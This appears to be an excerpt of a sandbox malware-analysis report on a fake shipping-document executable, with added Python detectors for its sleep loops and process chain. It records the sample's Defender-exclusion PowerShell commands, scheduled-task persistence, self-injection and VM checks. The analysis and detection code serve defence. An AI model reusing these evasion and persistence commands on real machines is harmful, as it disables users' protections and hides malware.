                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596921Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595058Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594613Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599438
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599094
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598982
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598860
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598735
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598610
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598485
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598360
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598110
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597985
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597860
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597747
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597625
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597516
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597406
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597281
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597172
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597047
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596938
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596813
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596590
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596469
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596341
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595982
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595865
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595749
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595625
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595516
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595297
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595187
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595078
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594969
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594859
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594739
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594500
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594391
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594281
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594172
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594050
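The "Thread delayed" rows above mix two different behaviours. The value 922337203685477 equals 2^63 divided by 10,000: a relative NtDelayExecution interval of the most negative 64-bit value, converted from 100 ns units to milliseconds, which is how a thread parked on an indefinite wait is rendered rather than a timed sleep. The runs that start at 600000 and drop by roughly 110 ms per call look like a loop that recomputes (deadline minus now) and sleeps for the remainder; had each ten-minute request been honoured, consecutive values would be far apart, so the small drop between requests is the real time that passed between the calls. The Python below is an added example and not part of the Joe Sandbox report: it parses rows in the report's layout (a constructed subset of the rows above is embedded; the regex also tolerates the fused "exeThread delayed" form and a trailing "Jump to behavior" link) and separates the two cases. Reading the countdown as a deadline loop, and the indefinite-wait interpretation of the large constant, are this example's assumptions, not statements the report makes.

```python
import re
from collections import defaultdict

# 2**63 // 10**4 = 922337203685477. A relative NtDelayExecution interval of
# INT64_MIN 100-ns units, shown in milliseconds. Treated here as an indefinite
# wait on a parked thread (assumption; the report does not explain the value).
INDEFINITE_MS = 2**63 // 10_000

# Consecutive requests that drop by more than this are not one countdown loop.
MAX_STEP_MS = 2_000

# Matches a row whether or not the separator between the image path and the
# text survived extraction; a trailing link suffix after the number is ignored.
ROW = re.compile(r"Source:\s*(?P<src>.*?\.exe).*?delay time:\s*(?P<ms>\d+)")

# Constructed sample: a subset of the report's "Thread delayed" rows, some in
# the cleaned layout and some exactly as extracted.
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599765Jump to behavior
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Thread delayed: delay time: 598982
"""


def parse_delays(text):
    """Map each source image path to its delay values (ms), in report order."""
    per_source = defaultdict(list)
    for line in text.splitlines():
        m = ROW.search(line)
        if m:
            per_source[m.group("src")].append(int(m.group("ms")))
    return dict(per_source)


def countdown_runs(delays):
    """Group finite delays into runs that strictly decrease in small steps.

    If the sample computes each delay as (deadline - now), the drop between
    two consecutive requests is the wall-clock time that passed between the
    calls, so first-minus-last is the real time the loop consumed while it
    requested the sum of all delays.
    """
    runs, current = [], []
    for ms in delays:
        if ms == INDEFINITE_MS:
            continue  # an indefinite wait is not part of a countdown
        if current and 0 < current[-1] - ms <= MAX_STEP_MS:
            current.append(ms)
        else:
            if len(current) >= 3:
                runs.append(current)
            current = [ms]
    if len(current) >= 3:
        runs.append(current)
    return [
        {
            "start_ms": r[0],
            "end_ms": r[-1],
            "calls": len(r),
            "requested_ms": sum(r),
            "wall_elapsed_ms": r[0] - r[-1],
        }
        for r in runs
    ]


def analyze(text):
    """Per source image: count of indefinite waits and the countdown runs."""
    return {
        src: {"indefinite_waits": delays.count(INDEFINITE_MS),
              "runs": countdown_runs(delays)}
        for src, delays in parse_delays(text).items()
    }


if __name__ == "__main__":
    for src, info in analyze(SAMPLE_ROWS).items():
        print(src, "indefinite waits:", info["indefinite_waits"])
        for run in info["runs"]:
            ratio = run["requested_ms"] / max(run["wall_elapsed_ms"], 1)
            print(f"  countdown {run['start_ms']}->{run['end_ms']} over "
                  f"{run['calls']} calls; requested/elapsed = {ratio:.0f}x")
```

On the embedded subset the dropped executable's run asks for about 5,995 s of sleep while only 1,018 ms of wall clock pass between its first and last request, a ratio in the thousands; a run whose ratio is near 1 would mean the sleeps were actually honoured.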
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3713823747.0000000000C99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                    Source: PrcGlGVKeUCXxg.exe, 0000000E.00000002.1376503389.0000000001413000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!X
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1314750589.00000000014C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3716119264.0000000000E97000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                    Source: PrcGlGVKeUCXxg.exe, 0000000E.00000002.1386369638.0000000007590000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 13_2_06699668 LdrInitializeThunk,13_2_06699668
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Memory written: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp"
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp"
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Process created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"
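Three of the process creations above form the chain a detection engineer keys on: powershell.exe run with Add-MpPreference -ExclusionPath for both the original sample and the dropped copy, schtasks.exe /Create with its task definition read from an XML file under C:\Users\user\AppData\Local\Temp, and each executable spawning a second instance of itself (the "Memory written ... base: 400000 value starts with: 4D5A" row is a PE header being written into that child). Note that the image path is C:\Windows\SysWOW64\...\powershell.exe while the command line names System32: the parent is a 32-bit process, so WOW64 file-system redirection resolves System32 to SysWOW64, and a rule that matches on the full image path has to allow both. The Python below is an added example, not code from the report or from the sandbox vendor; it runs those three rules over constructed process-creation events copied from the rows above plus one benign control event, and rolls the hits up into a verdict. The event field names (parent_image, image, cmdline), the rule names and the severity scheme are this example's assumptions.

```python
import re

# Exclusion added to Defender; also catches -ExclusionProcess / -ExclusionExtension.
ADD_EXCLUSION = re.compile(
    r'Add-MpPreference\b.*?-Exclusion(?P<kind>Path|Process|Extension)\s+"?(?P<value>[^"]+)',
    re.I)
XML_ARG = re.compile(r'/XML\s+"?(?P<path>[^"]+)', re.I)
TN_ARG = re.compile(r'/TN\s+"?(?P<name>[^"]+)', re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
USER_PROFILE = re.compile(r"^[A-Z]:\\Users\\", re.I)

# The three rules that, seen together, describe the chain in this report.
CHAIN = {"defender_exclusion_added", "schtask_from_temp_xml",
         "self_spawn_injection_candidate"}

DESKTOP = r"C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
ROAMING = r"C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"
PS_WOW64 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS_WOW64 = r"C:\Windows\SysWOW64\schtasks.exe"

# Constructed events: the report's rows as process-creation records, plus one
# benign control (an interactive shell reading, not writing, Defender settings).
SAMPLE_EVENTS = [
    {"parent_image": DESKTOP, "image": PS_WOW64,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"'},
    {"parent_image": DESKTOP, "image": PS_WOW64,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"'},
    {"parent_image": DESKTOP, "image": SCHTASKS_WOW64,
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp"'},
    {"parent_image": DESKTOP, "image": DESKTOP,
     "cmdline": r'"C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"'},
    {"parent_image": ROAMING, "image": SCHTASKS_WOW64,
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp"'},
    {"parent_image": ROAMING, "image": ROAMING,
     "cmdline": r'"C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile Get-MpPreference'},
]


def basename(path):
    """Match on the file name so System32 and SysWOW64 copies are treated alike."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the rule hits for one process-creation event."""
    hits = []
    image, cmd = basename(ev["image"]), ev["cmdline"]
    if image == "powershell.exe":
        m = ADD_EXCLUSION.search(cmd)
        if m:
            # Excluding something under a user profile is the worse case: the
            # exclusion shields whatever the user (or malware) can write there.
            severity = "high" if USER_PROFILE.search(m.group("value")) else "medium"
            hits.append({"rule": "defender_exclusion_added", "severity": severity,
                         "parent": ev["parent_image"],
                         "detail": f"{m.group('kind')}={m.group('value')}"})
    elif image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        xml = XML_ARG.search(cmd)
        if xml and TEMP_DIR.search(xml.group("path")):
            tn = TN_ARG.search(cmd)
            hits.append({"rule": "schtask_from_temp_xml", "severity": "high",
                         "parent": ev["parent_image"],
                         "detail": f"task={tn.group('name') if tn else '?'} xml={xml.group('path')}"})
    if ev["image"].lower() == ev["parent_image"].lower():
        hits.append({"rule": "self_spawn_injection_candidate", "severity": "medium",
                     "parent": ev["parent_image"],
                     "detail": "child image equals parent image"})
    return hits


def triage(events):
    """Run all rules and roll the hits up: full chain -> malicious, any -> suspicious."""
    findings = [hit for ev in events for hit in check_event(ev)]
    rules = {f["rule"] for f in findings}
    verdict = "malicious" if CHAIN <= rules else ("suspicious" if rules else "clean")
    return {"findings": findings, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for f in result["findings"]:
        print(f"[{f['severity']}] {f['rule']}: {f['detail']} (parent {f['parent']})")
    print("verdict:", result["verdict"])
```

The self-spawn rule is deliberately only medium on its own, since legitimate installers and updaters relaunch themselves; it is the combination with a fresh Defender exclusion and a scheduled task built from a temp-directory XML that makes the verdict.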
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
